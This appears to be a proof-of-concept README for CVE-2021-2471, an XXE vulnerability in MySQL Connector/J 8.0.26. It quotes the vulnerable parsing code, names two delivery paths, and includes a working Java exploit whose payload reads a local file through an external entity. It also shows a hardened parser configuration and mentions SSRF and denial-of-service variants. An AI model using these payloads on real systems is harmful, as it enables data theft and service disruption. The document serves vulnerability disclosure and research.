DrunkenShells/CVE-2021-2471

CVE-2021-2471 - XXE in MySQL Connector/J

Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior.
Successful exploitation can result in unauthorized access to critical data or complete access to all data reachable through MySQL Connectors, and in the ability to cause a hang or frequently repeatable crash (complete DoS) of MySQL Connectors.

Disclaimer:

This vulnerability was found by Xu Yuanzhen of Alibaba Cloud Security Team and Hongkun Chen of Alibaba.
This PoC is provided for research purposes. Do not use it to attack targets that you do not have explicit permission to exploit.

Vendor Disclosure:

The vendor's disclosure and fix for this vulnerability can be found here.

Proof Of Concept:

The vulnerability is a classic XXE: an XML document carrying malicious DTD entity declarations is handed to a MysqlSQLXML object, and the external entities are resolved when getSource() is called on it.

As seen in the code below, taken from mysql-connector-java-8.0.26.jar, when DOMSource.class is passed to getSource() the method builds a DocumentBuilder from a default DocumentBuilderFactory. The JDK default parser still processes DOCTYPE declarations and resolves external general entities (no disallow-doctype-decl, no external-general-entities=false), so whoever controls the content of the inputSource passed to builder.parse() can declare an external entity and have the parser read a local file or fetch a URL, or expand a recursive entity to hang the process:

    public <T extends Source> T getSource(Class<T> clazz) throws SQLException {
        try {
            this.checkClosed();
            this.checkWorkingWithResult();
            InputSource inputSource;
            if (clazz != null && !clazz.equals(SAXSource.class)) {
                SQLException sqlEx;
                if (clazz.equals(DOMSource.class)) {
                    try {
                        // Default factory: DOCTYPE and external entities stay enabled.
                        DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
                        builderFactory.setNamespaceAware(true);
                        DocumentBuilder builder = builderFactory.newDocumentBuilder();
                        if (this.fromResultSet) {
                            // XML read back from a result set column (path 2 below).
                            inputSource = new InputSource(this.owningResultSet.getCharacterStream(this.columnIndexOfXml));
                        } else {
                            // XML previously supplied via setString() (path 1 below).
                            inputSource = new InputSource(new StringReader(this.stringRep));
                        }

                        // External entities are resolved inside this parse() call.
                        return new DOMSource(builder.parse(inputSource));
                        // (catch blocks and the SAX/StAX/Stream branches follow in the
                        // original method and are omitted from this excerpt)

There are two ways to deliver the malicious XML to a MysqlSQLXML object:

  • Through sqlxml.setString() (if the attacker can call setString() or propagate arbitrary input into it)
  • By storing the XML in the database and having the victim retrieve it through resultSet.getSQLXML() (if the attacker has write access to the DB, or can point the victim at an attacker-controlled MySQL server)
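
The following is an added, self-contained illustration of the first delivery path and of what a hardened parser does with the same document; it is not the PoC shipped in this repository and not the vendor's patch. It assumes mysql-connector-java-8.0.26.jar is on the classpath, that the single-argument MysqlSQLXML(ExceptionInterceptor) constructor is public and tolerates null on the non-error path, and Java 11 or later for Files.writeString. The file it leaks is a temp file the program creates itself; the second path (resultSet.getSQLXML()) is not shown because it needs a live MySQL server. The hardened DocumentBuilderFactory is the generic JAXP hardening a reviewer would ask for, named here as an illustration rather than as the fix Oracle applied.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.OutputKeys;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

import com.mysql.cj.jdbc.MysqlSQLXML;

public class Cve20212471Poc {

    // XXE payload: the SYSTEM identifier points at a file the victim JVM can read.
    static String payload(Path target) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE x [ <!ENTITY xxe SYSTEM \"" + target.toUri() + "\"> ]>\n"
             + "<x>&xxe;</x>";
    }

    // Path 1: attacker-controlled XML goes in through setString(); the DOMSource
    // branch of getSource() then parses it with a default DocumentBuilderFactory.
    // Assumption: MysqlSQLXML(ExceptionInterceptor) is public and accepts null here.
    static String exploitViaSetString(String xml) throws Exception {
        MysqlSQLXML sqlxml = new MysqlSQLXML(null);
        sqlxml.setString(xml);
        DOMSource dom = sqlxml.getSource(DOMSource.class);   // entity resolved here

        // Serialise the returned DOM so the expanded entity becomes visible.
        StringWriter out = new StringWriter();
        Transformer t = TransformerFactory.newInstance().newTransformer();
        t.setOutputProperty(OutputKeys.OMIT_XML_DECLARATION, "yes");
        t.transform(dom, new StreamResult(out));
        return out.toString();
    }

    // Hardened factory (added example, not the vendor's fix): reject DOCTYPE outright
    // and, for parsers that ignore that flag, switch off external entities and DTDs.
    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    public static void main(String[] args) throws Exception {
        // Constructed target: a temp file standing in for /etc/passwd or a config file.
        Path secret = Files.createTempFile("xxe-secret", ".txt");
        Files.writeString(secret, "s3cr3t-from-disk");
        String xml = payload(secret);

        // Vulnerable path: on 8.0.26 the <x> element of the returned document
        // carries the contents of the target file.
        System.out.println("getSource(DOMSource.class) -> " + exploitViaSetString(xml));

        // Hardened parser: the same document is refused before any entity is touched.
        try {
            hardenedBuilder().parse(new InputSource(new StringReader(xml)));
            System.out.println("hardened parser accepted the DOCTYPE (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected payload: " + e.getMessage());
        }
    }
}
```

Run it with the vulnerable jar on the classpath (java -cp mysql-connector-java-8.0.26.jar:. Cve20212471Poc); swapping in a fixed release should make the first call fail the same way the hardened builder does. Pointing the SYSTEM identifier at an http:// URL turns the same payload into an SSRF probe, and a recursive entity (the "billion laughs" pattern) into the DoS the advisory mentions.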

Additional Resources:

PoC XXE using sqlxml.setString()
PoC XXE using resultSet.getSQLXML()
Download vulnerable JAR
Other XXE Payloads
